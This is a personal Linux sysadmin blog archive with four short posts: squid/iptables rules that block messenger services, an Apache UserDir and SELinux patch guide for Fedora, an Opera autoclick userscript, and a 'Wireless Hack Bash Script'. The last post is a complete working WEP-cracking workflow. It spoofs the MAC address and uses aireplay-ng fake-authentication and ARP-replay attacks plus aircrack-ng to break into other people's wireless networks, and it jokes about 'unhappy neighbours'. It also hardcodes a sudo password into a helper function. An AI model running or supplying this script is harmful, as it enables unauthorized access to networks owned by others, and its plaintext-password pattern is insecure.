Firewalls
March 1st, 2010
No comments
Archive
Archive for the ‘security’ Category
Block Messenger (squid + iptables)
March 1st, 2010
No comments
Block Messenger (squid + iptables)
In Mexico i was installed a firewall and squid on a server the important options are:
squid.conf:
acl no_permitido dstdomain "/etc/squid/blocked.domains" acl msn_mime req_mime_type -i ^application/x-msn-messenger$ acl msn_gw url_regex -i gateway.dll http_access deny all msn_mime http_access deny all msn_gw
blocked.domains:
.ebuddy.com .messengerfx.com .iloveim.com .meebo.com ...
iptables:
iptables -I FORWARD -p tcp --dport 1863 -j REJECT
Fedora 12 + Httpd + Userdir + SElinux Works
January 30th, 2010
No comments
Fedora 12 + Httpd + Userdir + SElinux Works
First install LAMP stack see the guide on HowtoForge
replace $USER for your username
mkdir $USER/public_html firefox http://localhost/~$USER/
If you see only Forbidden (403), don’t worry, do this:
I made a patch file (if you made custom changes on httpd.conf don’t use this file, do manual changes)
Install patch on your system and patch httpd.conf
yum install patch
my patch file:
--- httpd-patch.conf 2010-01-30 14:59:51.811850034 -0800
+++ httpd.conf 2010-01-30 14:25:04.527864263 -0800
@@ -349,14 +349,15 @@
# of a username on the system (depending on home directory
# permissions).
#
- UserDir disabled
+ #UserDir disabled
+ UserDir enabled $USER
#
# To enable requests to /~user/ to serve the user's public_html
# directory, remove the "UserDir disabled" line above, and uncomment
# the following line instead:
#
- #UserDir public_html
+ UserDir public_html
</IfModule>
@@ -364,18 +365,18 @@
# Control access to UserDir directories. The following is an example
# for a site where these directories are restricted to read-only.
#
-#<Directory /home/*/public_html>
-# AllowOverride FileInfo AuthConfig Limit
-# Options MultiViews Indexes SymLinksIfOwnerMatch IncludesNoExec
-# <Limit GET POST OPTIONS>
-# Order allow,deny
-# Allow from all
-# </Limit>
-# <LimitExcept GET POST OPTIONS>
-# Order deny,allow
-# Deny from all
-# </LimitExcept>
-#</Directory>
+<Directory /home/*/public_html>
+ AllowOverride FileInfo AuthConfig Limit
+ Options MultiViews Indexes SymLinksIfOwnerMatch IncludesNoExec
+ <Limit GET POST OPTIONS>
+ Order allow,deny
+ Allow from all
+ </Limit>
+ <LimitExcept GET POST OPTIONS>
+ Order deny,allow
+ Deny from all
+ </LimitExcept>
+</Directory>
#
# DirectoryIndex: sets the file that Apache will serve if a directorynext do:
patch /etc/httpd/httpd.conf < patch1.txt chmod 711 /home/$USER chmod 755 /home/$USER/public_html chcon -R -t httpd_sys_content_t /home/$USER/public_html setsebool -P httpd_enable_homedirs 1
now:
firefox http://localhost/~$USER/
Done.
Autoclick Opera Userscript
October 15th, 2009
No comments
Autoclick Opera Userscript
Autoclick code:
if (typeof e == 'object') { if (typeof e.click != 'undefined') { e.click(); return false; } else if (document.createEvent) { var evObj = document.createEvent('MouseEvents'); evObj.initEvent('click',true,true); e.dispatchEvent(evObj); return false; } else if (document.createEventObject) { e.fireEvent('onclick'); return false; } else { e.click(); return false; } }
Wireless Hack Bash Script
August 23rd, 2009
No comments
Wireless Hack Bash Script
#!/bin/bash # # WARNING: USE AT YOUR OWN RISK! # # SIDE EFFECTS: UNHAPPY NEIGHTBORS # # Author: ALbertux (Alberto Isaac Ayala Esquivias) # Mail: <Albertux@AyalaSoft.com> # Web: http://Albertux.AyalaSoft.com # Script: Wireless Hack # Tested on: Ubuntu 9.04 # A little trouble using gksudo gnome-terminal # https://bugs.launchpad.net/ubuntu/+source/gconf2/+bug/328575 # gnome-terminal -e "sudo ...." # could be ... # TERM=gnome-terminal TERM=xterm # A nasty function to run_like_a_root user sending the passwd function run_like_a_root() { sudo -S $@ << EOF your_password EOF } # Restore to normal: ./this_script.sh restore if [ "$1" == "restore" ]; then run_like_a_root "airmon-ng stop mon0" run_like_a_root "/etc/init.d/networking restart" run_like_a_root "NetworkManager" exit 1 fi # Set Wireless Device: ./this_script.sh wlan1 if [ -z $1 ]; then WDEVICE=wlan0 # Could be diferrent on your notebook else WDEVICE=$1 # Set Wireless Device fi # Stop Wireless run_like_a_root airmon-ng stop $WDEVICE # Kill all fu**ing process using the Wireless Device: run_like_a_root kill -9 `run_like_a_root airmon-ng start $WDEVICE | grep ^[1-9] | awk ' { print $1 } '` # Wireless Devices Down (we need to change the Mac) run_like_a_root ifconfig $WDEVICE down run_like_a_root ifconfig mon0 down # Fake Mac, Example: FAKEMAC=00:66:00:66:00:66 # Set Fake Mac run_like_a_root macchanger -m $FAKEMAC $WDEVICE run_like_a_root macchanger -m $FAKEMAC mon0 # Up the Wireless Interface run_like_a_root ifconfig mon0 up # See all available networks run_like_a_root $TERM -e "airodump-ng mon0" & # Watch the xterm loaded and write the values (maybe you need resize xterm window) clear echo "Network Name: " read ESSID echo "Network Mac: " read BSSID echo "Network Channel: " read CHANNEL echo "Close the airodump-ng xterm and press [enter]" read # Get Data (IVs) run_like_a_root $TERM -e "airodump-ng mon0 -w data -c $CHANNEL --bssid $BSSID" & # Fake Authentication Attack run_like_a_root $TERM -e "watch aireplay-ng -1 0 -e $ESSID -a $BSSID -h $FAKEMAC mon0" & # ARP Request run_like_a_root $TERM -e "aireplay-ng -3 -b $BSSID -h $FAKEMAC mon0" & # Wait some time ... echo "Press any kay to launch aircrack-ng (30,000+ on data recommended)" read # Crack the Passwd run_like_a_root $TERM -e "aircrack-ng data-*.cap" & exit 0
Recent Comments